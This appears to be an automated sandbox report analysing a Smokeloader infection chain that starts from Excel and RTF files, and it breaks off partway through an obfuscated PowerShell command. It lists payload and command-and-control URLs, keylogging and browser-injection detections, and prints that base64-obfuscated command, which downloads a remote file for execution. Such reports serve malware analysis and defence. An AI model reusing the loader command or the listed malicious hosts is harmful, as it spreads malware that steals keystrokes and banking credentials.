            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 13:51:50 GMTserver: Apache/2.4.59 (Debian)content-length: 409content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
            Source: powershell.exe, 0000000D.00000002.453954500.000000000243A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16
            Source: powershell.exe, 0000000D.00000002.453954500.000000000243A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/WEFV.txt
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.438240089.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.438240089.00000000005E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF
            Source: EQNEDT32.EXE, 00000009.00000002.438240089.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
            Source: explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 0000000F.00000002.625742820.0000000003EE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.514628656.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.507625773.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.510291767.0000000000644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.624681421.0000000000474000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.624657376.00000000002CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.624815942.0000000000594000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.624601316.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.624734588.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.624623660.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
            Source: explorer.exe, 00000013.00000002.514628656.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.507625773.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.510291767.0000000000644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.624681421.0000000000474000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.624657376.00000000002CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.624815942.0000000000594000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.624601316.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.624734588.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.624623660.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
            Source: explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
            Source: powershell.exe, 0000000B.00000002.457563315.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.453954500.00000000021E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000000F.00000002.626188065.0000000007B6D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://wrbvhkkkwfg.com/
            Source: explorer.exe, 0000000F.00000002.626188065.0000000007B6D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://wrbvhkkkwfg.com/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: explorer.exe, 0000000F.00000000.464950376.0000000003B98000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
            Source: explorer.exe, 0000000F.00000000.465313986.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007AA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.465011761.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 0000000F.00000000.465313986.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007AA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.465011761.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: crash.sh.url.4.drString found in binary or memory: https://crash.sh/
            Source: udMVqm.url.4.drString found in binary or memory: https://crash.sh/udMVqm
            Source: 40830001.xlsString found in binary or memory: https://crash.sh/udMVqm--C
            Source: 96630000.0.dr, ~DF5F0CCF6F4019BF3C.TMP.0.drString found in binary or memory: https://crash.sh/udMVqmyX
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 0000000D.00000002.453954500.000000000231B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
            Source: powershell.exe, 0000000D.00000002.453885422.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
            Source: powershell.exe, 0000000B.00000002.457563315.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
            Source: 7947.tmp.19.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49163 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: Yara matchFile source: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3164, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3216, type: MEMORYSTR
            Source: Yara matchFile source: 13.2.powershell.exe.2565ab4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_0008162B GetKeyboardState,ToUnicode,26_2_0008162B

            E-Banking Fraud

            barindex
            Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe22_2_00082EA8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe22_2_00083862

            System Summary

            barindex
            Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: Process Memory Space: powershell.exe PID: 2984, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2892, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 40830001.xlsOLE: Microsoft Excel 2007+
            Source: 96630000.0.drOLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\udMVqm.urlJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\crash.sh.urlJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9402
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9402Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? 